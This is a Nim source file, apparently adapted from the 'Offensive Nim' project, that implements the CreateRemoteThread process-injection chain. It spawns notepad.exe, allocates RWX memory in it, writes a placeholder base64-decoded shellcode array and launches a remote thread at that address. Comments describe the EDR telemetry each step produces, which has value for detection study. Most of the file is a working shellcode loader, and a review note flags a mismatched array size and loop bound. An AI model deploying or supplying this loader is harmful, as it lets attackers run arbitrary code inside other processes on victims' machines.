# With special thanks to byt3bl33d3r for Offensive Nim!
#
# Demonstration of the classic "CreateRemoteThread" code-injection sequence
# (OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread)
# against a freshly spawned notepad.exe.  Each of these four calls is a
# well-known telemetry point for EDR / ETW-based detection, so this file is
# useful as a reference for what such a chain looks like from the caller side.
import winim/lean
import osproc
import base64
import sequtils
import strutils

proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
  ## Spawns notepad.exe suspended, copies `shellcode` into an RWX region of
  ## that process and starts a remote thread at the region's base address.
  ##
  ## `shellcode` is a fixed-size array; `shellcode.len` is used for both the
  ## allocation size and the number of bytes written.  The `: void` return
  ## annotation is redundant in Nim (a proc without a return type is void).
  ##
  ## Handles are released through `defer`, so they are closed in reverse
  ## order of acquisition when the proc returns.  Win32 failures are only
  ## echoed, never checked: a NULL `pHandle`/`rPtr`/`tHandle` or a false
  ## `wSuccess` does not stop the remaining calls from being attempted.
  let tProcess = startProcess("notepad.exe")
  tProcess.suspend() # That's handy!
  defer: tProcess.close()
  echo "[*] Target Process: ", tProcess.processID

  # Full-access handle to the target.  PROCESS_ALL_ACCESS on a process that
  # the caller just created is a strong signal when correlated with the
  # memory-write and thread-creation events below.
  let pHandle = OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](tProcess.processID)
  )
  defer: CloseHandle(pHandle)
  echo "[*] pHandle: ", pHandle

  # Remote allocation committed directly as executable+writable (RWX).
  # Private RWX regions in another process are a common hunting criterion.
  let rPtr = VirtualAllocEx(
    pHandle,
    NULL,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE
  )

  # `unsafeAddr shellcode` yields a pointer to the array's storage; the
  # byte count written is reported back through `bytesWritten`.
  var bytesWritten: SIZE_T
  let wSuccess = WriteProcessMemory(
    pHandle,
    rPtr,
    unsafeAddr shellcode,
    cast[SIZE_T](shellcode.len),
    addr bytesWritten
  )
  echo "[*] WriteProcessMemory: ", bool(wSuccess)
  echo " \\-- bytes written: ", bytesWritten
  echo ""

  # Thread start address == base of the region allocated above.  A remote
  # thread whose start address is not backed by an image section is the
  # classic indicator this technique leaves behind.
  let tHandle = CreateRemoteThread(
    pHandle,
    NULL,
    0,
    cast[LPTHREAD_START_ROUTINE](rPtr),
    NULL,
    0,
    NULL
  )
  defer: CloseHandle(tHandle)
  echo "[*] tHandle: ", tHandle
  echo "[+] Injected"

echo "[*] Running in x64 process"
# `sc` is a placeholder: a base64 string whose decoded form is a
# comma-separated list of hex tokens (presumably "0x.." values, since each
# token is fed to `parseHexInt` after `strip`).
var sc = "Base64 Encoded string of comma-separated bytes goes here"
var sc_seq = base64.decode(sc).split(",")
  .map(proc (h: string): string = strip(h))
  .map(parseHexInt)
# NOTE(review): the array length (200626) and the loop bound (200261) do not
# match; elements past the loop bound stay zero-initialized, and the loop
# indexes `sc_seq` without checking its length (IndexDefect if shorter).
var shellcode: array[200626, byte]
for s in 0..200261:
  shellcode[s] = byte sc_seq[s]

# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
  injectCreateRemoteThread(shellcode)